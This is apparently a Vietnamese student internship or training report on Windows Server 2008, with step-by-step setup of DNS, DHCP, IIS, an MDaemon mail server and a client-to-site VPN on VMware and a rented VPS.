nhân viên CNTT xây dựng đặc tả tùy theo các vai trò máy chủ cần hỗ trợ.

Tích hợp Công nghệ Ảo hóa (Virtualization)Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho máy chủ trên nền hypervisor, cho phép tận dụng tối đa các khoản đầu tư vào phần cứng máy chủ bằng cách hợp nhất nhiều vai trò máy chủ thành các máy ảo riêng biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song song nhiều hệ

13


điều hành như Windows, Linux và các hệ điều hành khác một cách hiệu quả trên một máy chủ duy nhất. Với Hyper – V và các chính sách cấp phép đơn giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi phí và ảo hóa một cách dễ dàng hơn bao giờ hết.

Hình 1.3 Mô hình ảo hóaNhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008, các ứng dụng cũng được ảo hóa một cách hiệu quả. Terminal Services Gateway và Terminal Services RemoteApp cho phép dễ dàng truy cập từ xa tới các chương trình chuẩn hoạt động trên nền Windows từ bất cứ vị trí nào bằng cách chạy chương trình trên một máy chủ đầu cuối thay vì chạy trực tiếp trên một máy trạm mà không cần tới một mạng riêng ảo (VPN) phức tạp.

Được xây dựng phục vụ WebWindows Server 2008 xuất hiện với Internet Information Services 7.0 (IIS 7.0), một nền tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để phát triển và lưu trữ các ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính nâng cao quan trọng đối với nền tảng Web IIS 7.0 bao gồm một kiến trúc được thành phần hóa để đem tới khả năng linh hoạt và kiểm soát cao hơn. II.7.0 cũng cung cấp các khả năng quản lý được đơn giản hóa, khả năng khắc phục sự cố mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả năng mở rộng toàn diện.

Internet Information Server IIS 7.0 cùng với .NET Framework 3.0 cung cấp một nền tảng toàn diện để xây dựng các ứng dụng kết nối người dùng và dữ liệu, cho phép họ hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS 7.0 còn đóng vai trò trung tâm trong việc hợp nhất các công nghệ nền tảng Web của Microsoft – ASP.NET, các dịch vụ Web của Windows Communication Foudation, và Windows Sharepoint Services.

14


Hình 1.4 Giao diện Internet Information Services (IIS) Manager

Bảo mật caoWindows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ trước đến giờ. Hệ điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống lại hỏng hóc. Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp tới các mạng, máy chủ, dữ liệu của bạn và các tài khoản người dùng. Chức năng Network Access Protection (NAP) giúp đảm bảo rằng những máy tính nào muốn kết nối với mạng của bạn đều phải tuân thủ chính sách bảo mật của tổ chức. Việc tích hợp công nghệ và nhiều tính năng nâng cao khiến các dịch vụ Active Directory trở thành một giải pháp IDA (Identity and Access - Nhận dạng và Truy cập) tích hợp, hợp nhất và mạnh mẽ. Thêm vào đó, Read-Only Domain Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn triển khai cơ sở dữ liệu AD một cách bảo mật hơn trên khắp các khu vực của văn phòng chi nhánh.

Tính toán hiệu năng caoLợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở rộng tới Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng cao (HPC) của bạn. Windows HPC Server 2008 được xây dựng trên nền Windows Server 2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả tới hàng nghìn lõi xử lý với tính năng có sẵn để cải thiện hiệu suất, và giảm tính phức tạp của môi trường HPC. Windows HPC Server 2008 cho phép triển khai rộng rãi hơn bằng cách đem tới cho người dùng cuối những trải nghiệm phong phú và tích hợp, mở rộng từ ứng dụng máy bàn tới các cụm máy, và

15


bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và giám sát. Các công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có của bạn.

1.7 Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức

1.7.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare

Hình 2.1 VMware Workstation 10

VMWare WorkStation là một phần mềm giúp tạo máy ảo.

- Chạy các ứng dụng trên nhiều hệ điều hành bao gồm cả Linux, Windows và

nhiều hơn nữa cùng một lúc trên cùng một máy tính mà không cần khởi động

lại.

- Giúp đánh giá và kiểm tra hệ điều hành mới, các ứng dụng và các bản vá lỗi

trong một môi trường bị cô lập.

- Củng cố nhiều máy tính chạy các máy chủ web, máy chủ cơ sở dữ liệu, vv vào

một máy tính duy nhất.

16


- Xây dựng kiến trúc tham khảo để đánh giá trước khi triển khai vào sản xuất.

Như việc trong khi thực hành về máy Windows Server 2008 trên máy ảo để

nghiên cứu trước khi triển khai trên hệ thống thật.

1.7.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008

Xác định yêu cầu phần cứng:

Hình 2.3.1.1.1 Cấu hình cài đặt Windows Server 2008.

Các bước cài đặt Windows Server 2008 (cài đặt trên môi trường máy ảo

VMware Workstation)

Mở máy ảo

VMware

Workstation

17


Click File New

Vitual Machine…

Xuất hiện hộp

thoại New Vitual

Machine Wizard

Click Next>.

18


Click Installer disc

image file (iso) nếu

có file ISO và click

Browse.. chọn

đường dẫn đến nơi

chưa file ISO.Nếu

có đĩa Win Server

2008 thì chon

Installer disc.

Nhập Windows

Product key hoặc

để trống rồi Click

Next>

19


Chọn Location nơi

Windows Server sẽ

cài đặt vào nơi nào

trong ổ đĩa.

Click Next>

Nhập dung lượng ổ

đĩa vào ô

maximum disk size

khuyến nghị là 40

GB

Click Next>

20


Click Finish để tiến

hành cài đặt.

Chọn ngôn ngữ cài

đặt và click Next.

21


Bấm nút Install

now để bắt đầu cài

đặt.

Nhập product key

của phiên bản

Windows Server

2008 Enterprise

Nếu chưa muốn

kích hoạt Windows

vì mục đích kiểm

tra hoặc dùng thử,

bạn bỏ dấu chọn ở

mục Automaticall

y activate

Windows then

I’m online và bấm

nút Next.

22


Chọn kiểu cài

đặt Windows

Server 2008

Enterprise (Full

Installation).

Chọn I accept the

license terms và

bấm nút Next.

23


Chọn Custom

(advanced)

Chọn phân vùng ổ

đĩa cần cài

Windows Server

2008 và click

Next.

24


Chờ cho quá trình

cài đặt hoàn tất.

Trong lần đăng

nhập đầu tiên, hệ

thống yêu cầu bạn

thay đổi mật khẩu

ngay lập tức

25


Bạn bấm OK,

nhập mật khẩu mới

và bấm

phím Enter.

Và như vậy bạn đã

cài đặt hoàn tất

Windows Server

2008.

1.7.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008

Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu thực hiện các thao tác cầu hình ban đầu cho Windows (Initial Configuration Tasks). Trong đó bao gồm :

• Set time zone : thiết lập time zone cho server.

• Configure networking : thiết lập các thông số kết nối mạng bằng cách mở cửa sổ Network Connections và tương tác với các kết nối hiện có trên server.

• Provide computer name and domain : mở hộp hội thoại System Properties để thay đổi tên máy tính và kết nối vào domain.

• Enable automatic updating and feedback : kích hoạt tính năng này để cho phép bạn cấu hình Windows automatic updating, Windows Error Reporting và Customer Experience Improvement Program.

26


Hình 2.3.1.1.1 Màn hình Initial Configuration Task

Hình 2.3.1.1.2 Kích hoạt tính năng automatic updating and feedback

27


Cài đặt Server Manager

Ngay khi bạn kết thúc các bước cấu hình và đóng màn hình Initial

Configuration Tasks, màn hìnhServer Manager tự động được kích hoạt. Tại

đây, bạn có thể thực hiện hầu hết các thao tác cấu hình trên server.

Hình 2.3.1.1.3 Màn hình chính của Server Manager

Server Manager là một công cụ che phép bạn thực hiện hầu hết các thao tác

quản trị trên Windows Server 2008, từ các dịch vụ server như Active

Directory, DNS, DHCP, … đến các thành phần của hệ thống như .NET

Framework 3.0, Network Load Balancing, Group Policy Management, … ; từ

hệ thống firewall, quản lý user và group đến các dịch vụ sao lưu hệ thống,

quản lý đĩa…

Có thể nói rằng công cụ này là kết quả của sự kết hợp hòan hảo các công cụ quản lý trên những phiên bản Windows trước đó.

28


Theo mặc định, Server Manager sẽ tự động khởi động ngay sau khi bạn đăng nhập vào hệ thống. Nếu đã đóng cửa sổ này, bạn có thể thực hiện một trong những cách sau để mở lại :

• Kích chuột phải vào biểu tượng Computer trên desktop, chọn Manage.

Các thành phần trong Server Manager

Khi làm việc với Server Manager, bạn sẽ tương tác với 5 thành phần chính :

• Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây bạn cũng có thể quản lý chi tiết dữ liệu tương ứng với mỗi dịch vụ.

• Features cho phép bổ sung và loại bỏ các thành phần trên Windows Server 2008. Chức năng này tương tự như Add/Remove Windows Components trong các phiên bản Windows trước đó.

• Diagnostics tích hợp các thành phần Event Viewer, Reliability and Performance và Device Manager.

• Configuration bao gồm các công cụ Local Users And Group, Task Scheduler, Windows Firewall with Advanced Security, WMI Control và Services. WMI Control được dùng để quản lý các dịch vụ Windows Management Instrumentation.

• Storage tích hợp hai công cụ Windows Server Backup và Disk Management.

29


Hình 2.3.1.1.4 Quản lý chi tiết trên Active Directory Users and Computer.

Quản lý các dịch vụ Server (Roles)

Để mở các cửa sổ quản lý các dịch vụ server, bạn chọn mục Roles ở khung bên trái của màn hình Server Manager. Trên Windows Server 2008 nói chung, bạn có thể triển khai tất cả 16 dịch vụ server, từ Active Directory Domain Services đến các server như DHCP, DNS, Web, …

Lưu ý : ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows Server 2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V. Hyper-V là công nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.

Để cài đặt một dịch vụ server bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên hộp thoại Select Server Roles. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình cài đặt, tùy theo đặc điểm riêng của từng dịch vụ server, bạn sẽ điền thông tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.

30


Hình 2.3.1.1.5 Các dịch vụ Server trên Windows Server 2008

Quản lý các thành phần (Features)

Để mở cửa sổ quản lý các thành phần, bạn chọn mục Features ở khung bên trái của màn hình Server Manager. Trên Windows Server 2008 bạn có thể tương tác với tất cả 35 thành phần.

Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên hộp thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình cài đặt, tùy theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.

31


Hình 2.7 :Các thành phần Feature trên Windows Server 2008.

Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị trong khung Features Summary thuộc cửa sổ Server Manager. Tại đây, bạn cũng có thể thực hiện các thao tác bổ sung và loại bỏ các thành phần này.

Quản lý không gian lưu trữ và sao lưu dữ liệu (Storage) và Backup Server.

Mặc định, Windows Server Backup chưa sẵn dùng trên Windows Server 2008. Do đó, bạn cần bổ sung thành phần này vào hệ thống trước khi sử dụng. Các bước thực hiện như sau :

Trong cửa sổ Server Manager, ở khung Feature Summary, bạn chọn Add Features.

32


Trong màn hình Select Features, đánh dấu chọn mục Windows Server Backup Features và bấm nút Next.

Trong màn hình Confirm Insatallation Selection, bạn bấm nút Install để bắt đầu cài đặt.

Trong màn hình Installation Results, bạn bấm nút Close để hoàn thành thao tác bổ sung thành phần cần thiết vào Windows Server 2008.

33


Kích chuột phải lênh mục Windows Server Backup trong Storage, chọn Backup Schedule.

Trong màn hình Getting started, bấm nút Next.

34


Trong màn hình Select backup items, bạn chọn ổ đĩa chứa hệ điều hành của mình, trong trường hợp này là ổ đĩa C: và bấm nút Next

Trong màn hình Specify backup time, bạn chọn số lần và thời điểm sao lưu. Ở đây, chúng ta chọn sao lưu vào lúc 10:00 tối mổi ngày (Once a day). Sau khi chọn xong, bạn bấm nút Next.Trong màn hình Select destination disk, bạn đánh dấu chọn vào ổ đĩa mà mình sẽ sao lưu đến và bấm nút Next

35


Trong màn hình Label destination disk, bấm nút Next.

Trong màn hình Summary, bạn bấm nút Finish để hoàn thành thao tác tạo lịch trình sao lưu ổ đĩa

1.7.1.1.3 Cài đặt dịch vụ DNS

DNS (Domain Name System) Server là máy chủ được dùng để phân giải domain thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là 173.214.177.90

Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ liệu và gửi kết quả tương ứng về máy client.

36


Tại cửa sổ Server Manager, chọn mục Roles, chọn mục Add Roles.

Chọn DNS và click Next.

37


Click Next

Click Install để cài đặt DNS

38


Quá trình cài đặt hoàn tất.

Để cấu hình DNS Server vào menu Start\Programs\Administrative Tools, chọn DNS.

Forward Lookup Zones, chọn New Zone.

39


Trong màn hình Welcome, bấm nút Next.

Trong màn hình Zone Type, bạn chọn Primary zone để cấu hình DNS Server chính. Sau đó, bấm nútNext.

40


Trong màn hình Zone Name, bạn nhập tên zone vào mục Zone name, ví dụ thuvien-it.net. Sau đó, bấm nút Next

Trong màn hình Zonle File, bạn chấp nhận giá trị mặc định và bấm nút Next.

Để mặc định và click Next

41


Trong màn hình Completing, bạn xem lại thông tin về DNS Server và bấm nút Finish để hoàn thành thao tác cấu hình DNS.

Với các bước vừa thực hiện ở trên, bạn đã cấu hình chức năng forward, tiếp theo, bạn sẽ cấu hình chức năng reverse. Reverse Lookup Zones, chọn New Zone

42


Trong màn hình Welcome, bấm nút Next. Trong màn hình Zone Type, bạn chọn Primary.Sau đó, bấm nút Next.

Trong màn hình Reverse Lookup Zone Name, bạn chọn thể loại địa chỉ IP là Ipv4

43


Tiếp theo, bạn điền network IP của mình và bấm nút Next.

Trong màn hình Zone File, bạn chấp nhận giá trị mặc định nhằm tạo ra một file dùng để lưu các bản ghi DNS cho zone này, bấm nút Next.

44


Trong màn hình Dynamic Update, bạn chọn allow dynamic updates và bấm nút Next

Trong màn hình Completing, bạn bấm nút Finish để hòan thành thao tác cấu hình chức năng reverse trên DNS Server chính.

Cấu hình host đại diện dùng để phân giải tên ra số.

45


Mục name nhập www và mục IP address nhập địa chỉ Ip máy Server. Và Click Add host.

Để kiểm tra và start cmd và gõ lệnh nslookup.

Tạo Pointer đại diện tên 1 host có sẵn để phân giải tên ra IP.

46


Trong hộp thoại New Resource Record, bạn nhập địa chỉ IP vào mục Host IP address, đồng thời nhập tên máy vào mục Host name. Nếu không nhớ, bạn bấm nút Browse để tìm ra tên máy cần thiết. Sau khi điền xong, bấm nút OK.

Sau khi Click Browse…

Click OK.

1.7.1.1.4 Dịch Vụ DHCP

DHCP (Dynamic Host Configuration Protocol) Server là máy chủ được dùng để cấp phát địa chỉ IP động cho các máy trạm trong một hệ thống mạng. Trên các phiên bản trước như Windows 2000 Server hay Windows Server 2003, bạn đã quen thuộc với chức năng này.

Về cách thức hoạt động, DHCP Server sử dụng dịch vụ cùng tên để lắng nghe yêu cầu xin cấp phát địa chỉ IP được gởi từ máy trạm. Sau khi nhận yêu cầu, DHCP Server sẽ chọn ra một địa chỉ IP trong dãy địa chỉ của mình và gời về cho máy trạm. Đồng thời, DHCP Server cũng

47


gởi đến máy trạm các thông tin liên quan đến địa chỉ IP như subnet mask, địa chỉ IP của các DNS Server, default gateway, …Đối với Windows Server 2008, cách thức cài đặt và cấu hình được mô tả chi tiết ngay sau đây.

Mở cửa sổ Server Manager. Trong khung Roles Summary ở bên phải, bạn bấm nút Add Roles

Chọn dịch vụ DHCP và click Next

48


Click Next

Chọn card mạng lắng nghe yêu cầu xin cấp DHCP và click Next>

49


Nhập thông tin về domain và các DNS Server sau đó click Next.

Trong màn hình Specify Ipv4 WINS Server Settings, bạn chọn WINS is not required for applications on this network. Sau đó click Next.

50


Trong màn hình Add or Edit DHCP Scopes, bấm nút Add. Và điền các thông tin cần thiết. và click OK.

Sau khi hoàn thành việc định nghĩa các dãy địa chỉ, bạn bấm nút Next trong màn hình Add or Edit DHCP Scopes

51


Trong màn hình Configure DHCPv6 Stateless Mode, bạn chọn Disable DHCPv6 stateless mode for this server.

Trong màn hình Authorize DHCP Server, bạn chọn tài khoản dùng để cấp phép (authorizing) cho DHCP Server trong Active Directory Domain Services. Sau đó, bấm nút Next.

52


Trong màn hình Confirm Installation Selections, bạn xem lại các thiết lập vừa thực hiện và bấm nútInstall để bắt đầu cài đặt.

Như vậy chúng ta đã hoàn tất quá trình cài đặt và cấu hình dịch vụ DHCP.

Đến đây, DHCP đã sẵn sàng cung cấp địa chỉ IP cho các máy trạm trong hệ thống mạng. Nếu muốn hiệu chỉnh các thông số cấu hình, bạn thực hiện theo các bước sau:vào menu Start/Programs/Administrative Tools, chọn DHCP.

53


Mở rộng mục IPv4, kích chuột phải vào dòng Scope [172.16.0.0], chọn Properties

Trên tab General, bạn có thể thay đổi các giá trị Scope name, Start IP address, End IP address, giới hạn thời gian địa chỉ IP tồn tại trên máy trạm.

54


Để thay đổi gateway, bạn kích chuột phải lên mục 003 Router trong Scope Options, chọnProperties.

Thay đổi giá trị gateway bằng các chức năng Add và Remove.

55


Để thay đổi địa chỉ các DNS Server, bạn kích chuột phải lên mục 006 DNS Servers trong Server Options, chọn Properties.

Thay đổi địa chỉ của DNS Server bằng chức năng Add và Remove.

56


Để thay đổi tên miền, bạn kích chuột phải lên mục 015 DNS Domain Name trong Server Options, chọn Properties.

Nhập tên miền mới vào mục String value.

57


Cấu hình địa chỉ IP động trên máy trạm bạn mở cửa sổ Network Connections và truy cập vào hộp thoại Internet Protocol (TCP/IP) Properties. Tại đây, bạn chọn Obtain an IP address automatically và Obtain DNS server address automatically. Sau đó, bấm nút OK

Trên máy trạm lệnh xin cấp địa chỉ DHCP bằng cách vào Start Run gõ cmd enter.

Gõ lệnh ipconfig /renew.

Để xin trả lại địa chỉ IP mà DHCP đã cấp gõ lệnh ipconfig / release.

Như vậy chúng ta đã hoàn thành việc cấp địa chỉ IP động bằng dịch vụ DHCP.

58


1.7.1.1.5 Cấu hình Web Server IIS.

Mở cửa sổ Server Manager. Trong khung Roles Summary ở bên phải, bạn bấm Add Roles.

Trong màn hình Select Server Roles, chọn Web Server (IIS)

59


Trong hộp thoại Add features required for Web Server (IIS), bạn bấm nút Add Required Featuresđể bổ sung các thành phần liên quan đến Web Server.

Trong màn hình Select Server Roles, bấm nút Next.

Chọn lựa các thành phần bổ sung vào Web Server.

60


Trong màn hình Confirm Installation Selections, bạn xem lại các thiết lập vừa thực hiện và bấm nútInstall để bắt đầu cài đặt.

Sau khi cài đặt hoàn tất. Khi IIS Manager xuất hiện, bạn sẽ bắt gặp ngay trang web đầu tiên (IIS Start Page). Tại đây, bạn sẽ tìm thấy thông tin về các kết nối đến các Web Server mình đã quản lý trong thời gian gần với hiện tại.

61


Trong màn hình Specify Server Connection Details, bạn nhập địa chỉ IP của Web Server cần quản lý vào mục Server name và bấm nút Next.

Trong màn hình Specify a Connection Name, bạn nhập tên kết nối và bấm nút Finish.

62


Để thay đổi các thông số cấu hình trên Web Server, bạn kích chọn tên kết nối tương ứng với Web Server ở khung bên trái, sau đó chọn mục cần cầu hình ở khung chính giữa.

Để kiểm tra Web Server sau khi đã cài đặt, bạn mở trình duyệt và gõ địa chỉ http://localhost. Nếu màn hình IIS 7 xuất hiện như hình bên dưới, thao tác cài đặt và cấu hình Web Server của bạn đã thành công.

63


Xuất bản một website Mở cửa sổ Internet Information Service (IIS) Manager. Kích chuột phải lên mục Sites ở khung bên trái, chọn Add Web Site.

Trong hộp thoại Add Web Site, bạn điền thông tin :

Tên của website vào mục Site name

Nhập đường dẫn đến thư mục chứa mã nguồn của website vào mục Physical path hoặc bấm vào nút ba chấm (…) để định đường dẫn.

Nếu xuất bản website với mã nguồn chứa ở một máy tính khác, bạn cần bấm vào nút Connect as và chỉ định tài khoản

64


dùng để truy cập thư mục ở xa này.Nếu xuất bản nhiều website, bạn cần nhập tên truy cập chính xác của các website vào mục Host name.

Ngay sau đó, một thông báo xuất hiện, cho biết cổng 80 đã được một website khác sử dụng (thông thường là Default Web Site) Trong trường hợp này, bạn cần kích chọn Default Web Site và bấm nút Stop ở khung bên phải để ngưng trạng thái hoạt động của website này. Đồng thời, bạn chọn website của mình và bấm nút Start ở khung bên phải để kích hoạt trạng thái hoạt động cho website

65


Đến nay, bạn đã hoàn thành thao tác xuất bản một website. Nếu muốn kiểm tra, bạn mở trình duyệt và gõ địa chỉ http://localhost. Ngay sau đó, nội dung website của bạn sẽ xuất hiện.

1.7.1.1.6 Mail Server

Hiện nay có rất nhiều phần mềm quản lý Mail trên Server như: Mail Exchange,… nhưng MDaemon Mail Server: là 1 trong những giải pháp hệ thống mail server toàn diện nhất hiện nay dành cho các công ty, doanh nghiệp với quy mô khác nhau. MDaemon Mail Server hiện có 3 phiên bản: Standard, Pro và Free. Sau đây là một số điểm đáng chú ý của chương trình.

66


Hình 2.3.1.1.6.1 Giao diện Mdeamon.

Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đưa ra thông tin quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống kê, luồng dữ liệu đang trong trạng thái hoạt động (active) và các mail đang trong quá trình chờ đợi (queued) để được xử lý. Bên cạnh đó, còn có sự lựa chọn cho người dung chuyển đổi trạng thái activating/deactivating đối với các hệ thống máy chủ khác nhau có sử dụng MDaemon. Cửa sổ bên phải hiển thị đầy đủ thông tin về kết nối dữ liệu đầu vào và ra (incoming và outgoing) đang được thực hiện.

Sau đây là quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.

67


Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài đặt.Bấm "Next" để tiếp tục.

Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"

Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ điều hành Microsoft Windows).

68


Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.

Tùy chọn các thông tim phù hợp với vị trí, ở đây là VietNam

Điền đúng thông tin về quy mô của tổ chức hoặc công ty.

69


Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.

Chờ đợi cho quá trình cài đặt hoàn tất.

Điền tên Domain chính xác ví dụ: nguyendinhduy.tk

70


Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)

Giữ nguyên lựa chọn "Setup MDaemon as a system service"

71


Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng

Giao diện sau khi cài đặt thành công.

72


Tạo 1 tài khoảng mới vào Account New Account…

Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.

73


Vào OutLook Mail.

Cấu hình Out Look mail để quán lý mail cho tài khoảng [email protected]. Nhập tên hiện thị vào Display name và click Next>

74


mailto:[email protected]


Nhập địa chỉ Email và Click Next>

Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.

75


Nhập tên tài khoảng và mật khẩu. Click Next.

Click Finish để hoàn tất cấu hình quản lý mail cho tài khoảng test.

76


Tạo mail để kiểm ra việc gửi mail từ tài khoảng test đến 1 e mail bất kỳ.

Vào mail được gửi và kiểm tra Mail.

Xem mail tu tài khoảng [email protected]

77


Trả lời lại Mail của tài khoảng [email protected]

Vào lại mail của tài khoảng [email protected] và đã nhận được hồi âm.

Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên phần mềm Mdeamon.

1.7.1.1.7 Kết nối VPN

78




Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những người dùng truy cập từ xa có thể được định danh và xác thực; các được hầm có thể được tạo lập, duy trì và quản lý cho hàng trăm người dùng; việc định tuyến có thể kiểm soát tất cả luồng lưu lượng qua Gateway, và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn cần được duy trì.

Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng ảo hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần liên quan. Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.

Mô hình VPN Client to Site:

Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.

Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:

79


Đăng nhập vào máy chủ ảo VPS với quyền quản trị.

Vào Start Programs Administrative Tools Routing and remote access để cấu hình.

80


Giao diện Routing and remote Access

Click chuột phải vào server bà chọn Configure and Enable Routing and Remote Access.

81


Cửa sổ Routing and remote access server setup wizard hiện lên ta Click Next>

Ta chọn Custom Configutation.

82


Đánh dấu vào 2 mục VPN access và mục Lan routing.

Click Next>

Click Finish để tiến hành kích hoạt.

83


Click Yes để bắt đầu.

Routing and Remote Acces đã sẵn sàng.

Để cấu hình dãi địa chỉ IP khi các máy Client truy cập vào VPN sẽ được cấp ta right click vào Server và chọn Properties.

84


Chuyễn sang tab IP và chọn Static andress pool.

Nhập dãy địa chỉ bắt đầu vào Start IP address và dãy địa chỉ kết thúc vvào End IP address và Click OK để chấp nhận.

85


Như vậy chúng ta đã hoàn tất cấu hình cho phép có thể truy cập VPN vào máy chủ. Tiếp theo ta cần tào tài khoảng để có thể đăng nhập vào máy chủ. Bằng cách Right click vào My conputer và chọn Manage.

Tiếp theo ta vào System tools Local Users and Groups Users

86


Right Click vào User và chọn New User…

87


Tạo 1 user và điền tên user vào mục User name và mật khẩu vào ô Password và nhập lại mật khẩu vào ô Confim password.

Click Create để tạo user.

Tượng tự tạo 1 user khác có tên là client 2

88


Để User có quyền truy cập VPN ta right click vào tài khoảng cần cấp quyền và chọn Properties

89


Sang tab Dial-in và chọn Allow Access để cấp quyền và click OK để hoàn tất. Tương tự cho user có tên là Client2.

Chuẩn bị 2 máy ảo. Trên máy ảo thứ 1 ta vào Start Settings Network Connections.

90


Click vào Create a new Connection.

Hộp thoại New Connection Wizard hiện lên và click Next>

91


Chọn mục Connect to the Network at my workplace và click Next>

Click chọn Virual Private Network connection và chọn Next>

92


Nhập tên công ty vào ô company name và click Next>

Click Do not dial the intial connection và click Next>

93


Nhập địa chỉ IP của máy chủ hoặc tên domain đã đăng ký và click Next>

Chọn Anyone’s use và click Next>

94


Chọn add a shortcut to this connection to my desktop để thuận tiện cho lần kết nối sau và click Finish để hoàn tất.

Màn hình đăng nhập hiện lên ta nhập tên User và Password cần kết nối và click Connect.

95


Sau khi kết nối thành công thì bên góc phải màn hình sẽ có kết nối mạng thứ 2.

Double click vào biểu tượng mạng kết nối chuyển sang tab Details để xem chi tiết.

96


Các bước thực hiện tương tự cho Client 2. Và kết quả cho Client 2 như sau.

Trên Client1 tiến hành ping đến địa chỉ Clien2.

97


Và trên Client 2 ping đến địa chỉ Clien1.

Trên Clien1 tiến hành share 1 folder cho Clien 2. Bằng cách tạo 1 folder right click chọn properties tab sharing chọn Share this folder click OK.

98


Trên Client 2 vào Start run gõ //địa chỉ client 2 (10.0.0.101) và click OK.

Đã thấy được thư mục mà Client 1 đã share.

Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.

1.7.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private server)

VPS theo lưu lượng là loại hình máy chủ VPS tiện dụng, phù hợp & đem lại nhiều lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ riêng với chi phí CỰC THẤP.

VPS là dịch vụ máy chủ chạy dưới dạng chia sẻ từ 1 tài nguyên server chính hoạt động như một Dedicated Server. Người quản trị (khách hàng) có quyền cao nhất để toàn quyền quản trị Server.

VPS kết nối Internet với 01 IP tĩnh và được cài đặt sẵn hệ điều hành tùy chọn. VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị giới hạn số lượng domain.

VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server, Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi nhánh với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật.

VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy chủ giảm tối đa chi phí.

99


VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian thực hiện rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.

VPS như một giải pháp dung hòa giữa Web Hosting và Dedicated Server theo cả nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp cho các cá nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng biệt, toàn quyền quản lý với Chi Phí Thấp.

Hình 2.3.2.1 Giao diện Remote Desktop Connection

Thông qua chương trình Remote Desktop Connection ta truy cập vào VPS đã

được thuê để tiến hành cấu hình, triển khai các dịch vụ như trên máy thật.

Hình 2.3.2.2 Giao diện ban đầu khi đăng nhập vào máy chủ VPS

Chúng ta tiến hành nhập User name và Password đã được cung cấp từ bên cho

thuê để truy cập vào.

100


Hình 2.3.2.3 Giao diện khi đã đăng nhập vào máy chủ VPS

1.7.2.1 Mail Server trên máy chủ ảo VPS.

Đăng nhập

máy chủ

ảo VPS

bằng công

cụ Remote

Desktop.

101


Đăng nhập

vào máy

